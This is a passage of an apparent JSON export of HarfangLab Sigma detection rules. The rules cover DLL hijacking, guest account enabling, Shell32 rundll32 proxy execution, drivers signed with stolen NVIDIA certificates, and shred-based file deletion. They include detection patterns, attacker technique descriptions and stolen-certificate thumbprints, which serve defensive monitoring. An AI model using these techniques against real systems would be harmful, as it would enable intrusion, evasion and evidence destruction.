get any info about the DLL\n\n exclusion_legitimate_dll:\n # old pascal/delphi \"version.dll\", not the MS ones (and upx packed..)\n sha256:\n - '31144e8b156fe87317073c48a09abcb033fda8dbdd96986c4abea8c00c00355f'\n - '3eba921ef649b71f98d9378dee8105b38d2464c9ccde37a694e4a0cd77d22a75'\n - '645ca9e88da21c63710a04a0f54421018df415a3d612112c71a255c49325c082'\n - 'd7ce1a67db5dee613760775ad4639ddb9ed2dd07f169996c78133820337d1aa3' # C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\VERSION.dll\n - 'a9a39c8c61d5cdcb9ea67e7ee5916d7f60dfe40b31474381cbdf0102f698fbb4' # Balatro\\version.dll\n\n exclusion_veeam:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\rundll32.exe aepdu.dll,AePduRunUpdate'\n - '?:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\\\*\\Bin\\ccSvcHst.exe'\n # SHA-256: 3d520df7824e332886a1307d3153e0fb5c2b85ac67a1e194ee3adb1bfbaecf8a\n # SHA-256: ccd18aa682718cd765840c249c10c9be4d41affd8fc7a590d5f25619a22814f5\n ImageLoaded: '?:\\Program Files (x86)\\Veeam\\Backup Transport\\GuestInteraction\\VSS\\VeeamGuestHelpers\\WinCoreCompatLayer\\version.dll'\n\n exclusion_signed:\n Signature:\n # ImageLoaded: 'C:\\Program Files\\QlikView\\Server\\QlikViewClients\\QlikViewAjax\\bin\\Version.dll'\n - 'QlikTech International AB'\n - 'ASUSTeK Computer Inc.'\n - 'IObit CO., LTD'\n - 'Veeam Software Group GmbH'\n\n exclusion_imageloaded:\n ImageLoaded:\n - '?:\\$WINDOWS.~BT\\NewOS\\Windows\\System32\\version.dll'\n - '?:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\amd64_microsoft-windows-version_*\\version.dll'\n - '?:\\ProgramData\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\forwarders\\version.dll'\n\n exclusion_app:\n ProcessImage|contains:\n - '\\App\\GlaryUtilities\\'\n - '\\App\\SketchUp 20??\\'\n - '\\App\\TreeSize\\TreeSize.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Glarysoft Ltd'\n - 'Trimble Inc.'\n - 'JAM Software GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0c391c25-0ca4-4a33-a98e-d0de4cc1eee6", "rule_name": "DLL Hijacking of VERSION.DLL", "rule_description": "Detects a potential Windows DLL search order hijacking of VERSION.DLL.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nBy putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-07-15", "rule_modified_date": "2025-10-21", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0c620fa1-5877-425b-b91e-920d723b4eab", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.591725Z", "creation_date": "2026-03-23T11:45:34.591728Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.591736Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://wietze.github.io/blog/save-the-environment-variables", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_dxcap.yml", "content": "title: DLL Hijacking via dxcap.exe\nid: 0c620fa1-5877-425b-b91e-920d723b4eab\ndescription: |\n Detects potential Windows DLL Hijacking via dxcap.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dxcap.exe'\n ImageLoaded|endswith:\n - '\\d3d11.dll'\n - '\\dbghelp.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0c620fa1-5877-425b-b91e-920d723b4eab", "rule_name": "DLL Hijacking via dxcap.exe", "rule_description": "Detects potential Windows DLL Hijacking via dxcap.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0c76fbf6-2adc-4728-bf4c-92b0f9d5c847", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.088943Z", "creation_date": "2026-03-23T11:45:34.088945Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.088949Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#guest", "https://attack.mitre.org/techniques/T1078/001/" ], "name": "t1078_001_guest_account_enabled.yml", "content": "title: Guest Account Enabled\nid: 0c76fbf6-2adc-4728-bf4c-92b0f9d5c847\ndescription: |\n Detects the activation of the Guest account.\n This account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\n It is recommended to investigate this action to determine its legitimacy and investigate any suspicious authentications using the guest account.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#guest\n - https://attack.mitre.org/techniques/T1078/001/\ndate: 2024/01/04\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.initial_access\n - attack.t1078.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4722\n TargetSid|endswith: '-501'\n\n condition: selection\nlevel: high\nconfidence: moderate", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0c76fbf6-2adc-4728-bf4c-92b0f9d5c847", "rule_name": "Guest Account Enabled", "rule_description": "Detects the activation of the Guest account.\nThis account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\nIt is recommended to investigate this action to determine its legitimacy and investigate any suspicious authentications using the guest account.\n", "rule_creation_date": "2024-01-04", "rule_modified_date": "2025-02-04", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.initial_access", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1078.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0cd0225c-b3cf-4b13-b578-75c10f83bbb5", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.086416Z", "creation_date": "2026-03-23T11:45:34.086418Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.086422Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Libraries/Shell32/", "https://attack.mitre.org/techniques/T1218/011/" ], "name": "t1218_011_suspicious_shell32.yml", "content": "title: Suspicious Proxy Execution via Shell32\nid: 0cd0225c-b3cf-4b13-b578-75c10f83bbb5\ndescription: |\n Detects the suspicious execution of the legitimate Windows DLL Shell32.dll using parameters allowing for proxy execution.\n This binary can be used as a LOLBin in order to execute binaries or load DLLs.\n It is recommended to investigate the process responsible for the execution of Shell32 as well as the executed payload to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Shell32/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/15\nmodified: 2025/10/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Shell32\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_exec_rundll:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'rundll32.exe'\n\n selection_exec_shell32:\n CommandLine|contains|all:\n - 'shell32'\n - ','\n\n selection_exec_args:\n CommandLine|contains:\n - 'Control_RunDLL'\n - '#274' # Control_RunDLL\n - '#275' # Control_RunDLLA\n - '#276' # Control_RunDLLAsUserW\n - '#277' # Control_RunDLLW\n - 'ShellExec_RunDLL'\n - '#569' # ShellExec_RunDLL\n - '#570' # ShellExec_RunDLLA\n - '#571' # ShellExec_RunDLLW\n\n selection_suspicious_ordinal:\n CommandLine|contains:\n - '#274' # Control_RunDLL\n - '#275' # Control_RunDLLA\n - '#276' # Control_RunDLLAsUserW\n - '#277' # Control_RunDLLW\n - '#569' # ShellExec_RunDLL\n - '#570' # ShellExec_RunDLLA\n - '#571' # ShellExec_RunDLLW\n\n selection_suspicious_folder:\n CommandLine|contains:\n - '\\AppData\\'\n - '\\Temp\\'\n - '%AppData%'\n - '%LocalAppData%'\n - '%Temp%'\n - '?:\\Users\\Public'\n - '?:\\PerfLogs\\'\n\n exclusion_share:\n ParentImage|startswith: '\\\\\\\\'\n\n exclusion_legitimate:\n CommandLine|contains:\n - '@screensaver'\n - 'mmsys.cpl,,playback'\n - 'mmsys.cpl,,sounds'\n - 'mmsys.cpl,,recording'\n - 'mmsys.cpl,,{0.0.0.00000000}'\n - '?:\\Windows\\system32\\\\*.cpl'\n - '?:\\windows\\CCM\\\\*.cpl'\n - '\\Office??\\MLCFG32.CPL'\n - 'PowerCfg.cpl @0,/editplan:'\n - 'input.dll,,{C07337D3-DB2C-4D0B-9A93-B722A6C106E2}'\n - 'inetcpl.cpl,,0'\n - 'Control_RunDLL desk.cpl,'\n - 'sysdm.cpl,,1'\n - 'Control_RunDLL timedate.cpl'\n - 'Control_RunDLL nusrmgr.cpl'\n - 'Control_RunDLL srchadmin.dll'\n - 'Control_RunDLL ?:\\WINDOWS\\System32\\srchadmin.dll'\n - 'Control_RunDLL appwiz.cpl,'\n - 'Control_RunDLL bthprops.cpl,'\n\n exclusion_jp2launcher:\n ParentImage:\n - '?:\\Program Files\\Java\\\\*\\bin\\jp2launcher.exe'\n - '?:\\Program Files (x86)\\\\*\\bin\\jp2launcher.exe'\n\n # https://www.berger-levrault.com/fr/\n exclusion_berger-levrault:\n ParentImage: '?:\\Program Files (x86)\\BL\\BL\\bin\\e.magnus.exe'\n\n exclusion_healthcare:\n ParentImage: '?:\\Program Files\\GE Healthcare\\Centricity\\\\*.exe'\n\n exclusion_xilinx:\n ParentImage: '?:\\Xilinx\\xic\\tps\\win64\\\\*\\bin\\java.exe'\n\n condition: all of selection_exec_* and 1 of selection_suspicious_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0cd0225c-b3cf-4b13-b578-75c10f83bbb5", "rule_name": "Suspicious Proxy Execution via Shell32", "rule_description": "Detects the suspicious execution of the legitimate Windows DLL Shell32.dll using parameters allowing for proxy execution.\nThis binary can be used as a LOLBin in order to execute binaries or load DLLs.\nIt is recommended to investigate the process responsible for the execution of Shell32 as well as the executed payload to look for malicious content or actions.\n", "rule_creation_date": "2022-12-15", "rule_modified_date": "2025-10-03", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1218.011" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0cde446e-6eec-4d9c-a4df-ad0b836c3406", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.080575Z", "creation_date": "2026-03-23T11:45:34.080577Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.080581Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_bdservicehost.yml", "content": "title: DLL Hijacking via bdservicehost.exe\nid: 0cde446e-6eec-4d9c-a4df-ad0b836c3406\ndescription: |\n Detects potential Windows DLL Hijacking via bdservicehost.exe, seen in a previous PlugX attack.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/08\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bdservicehost.exe'\n ProcessSignature: 'Bitdefender SRL'\n ImageLoaded|endswith: '\\log.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\BitDefender\\'\n - '?:\\Program Files (x86)\\BitDefender\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\BitDefender\\'\n - '?:\\Program Files (x86)\\BitDefender\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Bitdefender SRL'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0cde446e-6eec-4d9c-a4df-ad0b836c3406", "rule_name": "DLL Hijacking via bdservicehost.exe", "rule_description": "Detects potential Windows DLL Hijacking via bdservicehost.exe, seen in a previous PlugX attack.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-11-08", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0cf16516-206d-4746-b55e-291542898e67", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.618982Z", "creation_date": "2026-03-23T11:45:34.618984Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.618988Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_klist.yml", "content": "title: DLL Hijacking via klist.exe\nid: 0cf16516-206d-4746-b55e-291542898e67\ndescription: |\n Detects potential Windows DLL Hijacking via klist.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'klist.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\netutils.dll'\n - '\\secur32.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0cf16516-206d-4746-b55e-291542898e67", "rule_name": "DLL Hijacking via klist.exe", "rule_description": "Detects potential Windows DLL Hijacking via klist.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0d1a3edd-eeb6-4a1c-8c08-047b57bbe2d8", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.079072Z", "creation_date": "2026-03-23T11:45:34.079074Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.079079Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://blog.malwarebytes.com/awareness/2022/03/stolen-nvidia-certificates-used-to-sign-malware-heres-what-to-do/", "https://attack.mitre.org/techniques/T1553/002/" ], "name": "t1553_002_nvidia_stolen_cert_driver_load.yml", "content": "title: Driver Loaded Signed with NVIDIA Stolen Certificate\nid: 0d1a3edd-eeb6-4a1c-8c08-047b57bbe2d8\ndescription: |\n Detects the loading of driver signed using one of NVIDIA's stolen certificates.\n This can be the sign of a malware using a fake signature to evade AV/EDR detection.\n It is recommended to find the process responsible for this action using the related timeline or through jobs, as well as to analyze the loaded driver to look for malicious content and actions.\nreferences:\n - https://blog.malwarebytes.com/awareness/2022/03/stolen-nvidia-certificates-used-to-sign-malware-heres-what-to-do/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/07/12\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: driver_load\ndetection:\n selection_cert_1:\n DriverSignatureSignerThumbprint: '579aec4489a2ca8a2a09df5dc0323634bd8b16b7'\n\n filter_timestamp_cert_1:\n DriverPETimestampStr|startswith:\n - '2011-'\n - '2012-'\n - '2013-'\n - '2014-01'\n - '2014-02'\n - '2014-03'\n - '2014-04'\n - '2014-05'\n - '2014-06'\n - '2014-07'\n - '2014-08'\n\n selection_cert_2:\n DriverSignatureSignerThumbprint: '30632ea310114105969d0bda28fdce267104754f'\n\n filter_timestamp_cert_2:\n DriverPETimestampStr|startswith:\n - '2015-07'\n - '2015-08'\n - '2015-09'\n - '2015-10'\n - '2015-11'\n - '2015-12'\n - '2016-'\n - '2017-'\n - '2018-01'\n - '2018-02'\n - '2018-03'\n - '2018-04'\n - '2018-05'\n - '2018-06'\n - '2018-07'\n\n filter_copyright:\n LegalCopyright|contains:\n - 'NVIDIA'\n - 'Galasoft'\n\n condition: ((selection_cert_1 and not filter_timestamp_cert_1) or (selection_cert_2 and not filter_timestamp_cert_2)) and not filter_copyright\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0d1a3edd-eeb6-4a1c-8c08-047b57bbe2d8", "rule_name": "Driver Loaded Signed with NVIDIA Stolen Certificate", "rule_description": "Detects the loading of driver signed using one of NVIDIA's stolen certificates.\nThis can be the sign of a malware using a fake signature to evade AV/EDR detection.\nIt is recommended to find the process responsible for this action using the related timeline or through jobs, as well as to analyze the loaded driver to look for malicious content and actions.\n", "rule_creation_date": "2022-07-12", "rule_modified_date": "2025-02-04", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1553.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0d4bd1c5-18a6-4c6e-a08e-48adc41e2884", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.628455Z", "creation_date": "2026-03-23T11:45:34.628457Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.628462Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://man7.org/linux/man-pages/man1/shred.1.html", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-3---overwrite-and-delete-a-file-with-shred", "https://attack.mitre.org/techniques/T1070/004/", "https://attack.mitre.org/techniques/T1485/" ], "name": "t1070_004_delete_with_shred.yml", "content": "title: File Deleted via shred\nid: 0d4bd1c5-18a6-4c6e-a08e-48adc41e2884\ndescription: |\n Detects the execution of shred, a tool used to overwrite a file's content before deleting it.\n Attackers can overwrite any files left by their malicious activities to prevent forensic and slow the investigation, or use shred to destroy sensitive information as part of a ransomware attack.\n It is recommended to investigate the parent process as well as the files being deleted to determine whether this action was legitimate.\nreferences:\n - https://man7.org/linux/man-pages/man1/shred.1.html\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-3---overwrite-and-delete-a-file-with-shred\n - https://attack.mitre.org/techniques/T1070/004/\n - https://attack.mitre.org/techniques/T1485/\ndate: 2023/01/06\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - attack.impact\n - attack.t1485\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Shred\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/shred'\n CommandLine|contains:\n - ' -u'\n - ' -?u'\n - ' -??u'\n - ' -???u'\n\n exclusion_space:\n CommandLine|contains:\n - ' - u'\n - ' -? u'\n - ' -?? u'\n\n exclusion_plz_sandbox:\n ParentCommandLine: '/tmp/plz_sandbox/third_party/system_tools/logrotate/logrotate -v -m ./mailer -s state test-config.15 --force'\n\n exclusion_blacknoise:\n ParentCommandLine: 'sudo -S shred -u /tmp/blacknoise_BLCKNS_DEF_L0007.001'\n\n exclusion_logrotate:\n ParentCommandLine: '/usr/sbin/logrotate /etc/logrotate.conf'\n CommandLine: 'shred -u -'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", 